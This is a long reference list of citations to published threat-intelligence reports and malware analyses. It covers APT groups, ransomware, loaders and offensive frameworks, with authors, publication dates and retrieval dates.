- Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022.
- Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.
- Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.
- Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
- S2W TALON. (2022, June 16). Raccoon Stealer is Back with a New Version. Retrieved August 1, 2024.
- Quentin Bourgue, Pierre le Bourhis, & Sekoia TDR. (2022, June 28). Raccoon Stealer v2 - Part 1: The return of the dead. Retrieved August 1, 2024.
- Pierre Le Bourhis, Quentin Bourgue, & Sekoia TDR. (2022, June 29). Raccoon Stealer v2 - Part 2: In-depth analysis. Retrieved August 1, 2024.
- Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
- Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
- Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.
- McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.
- Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.
- Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.
- Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.
- Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021.
- Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.
- ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.
- Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.
- FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
- Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.
- Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.
- Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.
- Lechtik, M, and etl. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.
- FBI et al. (2023, May 9). Hunting Russian Intelligence “Snake” Malware. Retrieved June 8, 2023.
- Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.
- MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
- Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.
- CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020.
- Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
- Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.
- Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.
- ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
- Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.
- Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.
- Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
- National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
- CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.
- Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.
- Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.
- Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
- Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.
- Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
- Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
- Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.
- Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
- Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.
- Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018.
- Vrabie, V., et al. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved September 8, 2021.
- Savelesky, K., et al. (2019, July 23). ABADBABE 8BADFOOD: Discovering BADHATCH and a Detailed Look at FIN8's Tooling. Retrieved September 8, 2021.
- Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021.
- FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.
- FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
- Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
- Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
- Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
- Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.
- Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022.
- Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.
- Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.
- Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.
- Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.
- CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
- Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.
- Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.
- The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.
- Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.
- Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.
- Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
- ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
- S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022.
- Falcone, R. et al.. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.
- Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
- Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.
- An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
- Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022.
- Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.
- Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.
- Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.
- Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.
- Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved September 12, 2024.
- Patrick Schläpfer . (2024, April 10). Raspberry Robin Now Spreading Through Windows Script Files. Retrieved May 17, 2024.
- Lauren Podber and Stef Rand. (2022, May 5). Raspberry Robin gets the worm early. Retrieved May 17, 2024.
- Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.
- Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.
- Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
- Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020.
- Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.
- Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
- Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
- ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
- Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.
- ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019.
- Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
- Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
- Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021.
- FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.
- Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.
- Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.
- TheWover. (2019, May 9). donut. Retrieved March 25, 2022.
- Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
- Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.
- Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.
- Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.
- ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.
- Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.
- Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
- Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.
- Group-IB. (2021, November). RedCurl: The Awakening. Retrieved August 14, 2024.
- Group-IB. (2020, August). RedCurl: The Pentest You Didn’t Know About. Retrieved August 9, 2024.
- Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
- Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
- ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
- Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.
- Stepanic, D. and Bousseaden, S. (2024, May 15). Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID. Retrieved September 13, 2024.
- Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May 31, 2024.
- Batista, J. (2024, June 17). Latrodectus, are you coming back?. Retrieved September 13, 2024.
- Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.
- Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.
- Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
- Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.
- Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022.
- Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.
- SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19
- Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
- McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.
- Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.
- Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
- Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.
- Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.
- Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.
- GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.
- Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.
- S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.
- Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
- hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.
- Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018.
- Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
- Jurčacko, F. (2024, May 15). To the Moon and back(doors): Lunar landing in diplomatic missions. Retrieved June 26, 2024.
- ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.
- ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
- Kohler, A. and Lopez, C. (2024, April 30). Malware: Cuckoo Behaves Like Cross Between Infostealer and Spyware. Retrieved August 20, 2024.
- Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.
- Nicolas Verdier. (n.d.). Retrieved January 29, 2018.
- Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.
- Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.
- Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.
- kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.
- ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019.
- Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.
- NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
- Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
- Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.
- Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021.
- Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.
- Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
- Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
- BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.
- Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.
- NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.
- Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.
- Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.
- CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
- Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.
- John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
- Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.
- Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.
- Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
- Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
- Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
- Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
- Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.
- Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.
- cobbr. (2021, April 21). Covenant. Retrieved September 4, 2024.
- Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.
- SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023.
- Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.
- Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.
- MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022.
- Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.
- Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.
- Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018.
- Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021.
- Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.
- Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
- Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved September 12, 2024.
- GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.
- Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
- Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.
- Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.
- Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.
- hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.
- Amitai Ben & Shushan Ehrlich. (2021, May). From Wiper to Ransomware: The Evolution of Agrius. Retrieved May 21, 2024.
- Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
- Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.
- F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.
- Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.
- Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.
- Dutch Military Intelligence and Security Service (MIVD) & Dutch General Intelligence and Security Service (AIVD). (2024, February 6). Ministry of Defense of the Netherlands uncovers COATHANGER, a stealthy Chinese FortiGate RAT. Retrieved February 7, 2024.
- Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.
- The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.
- Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.
- Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
- Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
- Shelmire, A.. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.
- Black Lotus Labs. (2024, August 27). Taking The Crossroads: The Versa Director Zero-Day Exploitaiton. Retrieved August 27, 2024.
- Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
- Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22
- Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
- Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
- Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018.
- Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.
- Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.
- Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
- Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
- Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021.
- Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021.
- Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.
- Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021
- Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.
- Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
- ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
- Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.
- DFIR. (2022, April 25). Quantum Ransomware. Retrieved July 26, 2024.
- DFIR. (2021, March 29). Sodinokibi (aka REvil) Ransomware. Retrieved July 22, 2024.
- Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
- Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.
- McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
- Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
- Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.
- Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
- Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.
- Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
- Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021.
- GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
- CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.
- KISA. (2021). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 8, 2024.
- Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.
- Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.
- Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020.
- DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
- Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.
- Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.
- Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.
- Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020.
- Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.
- Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.
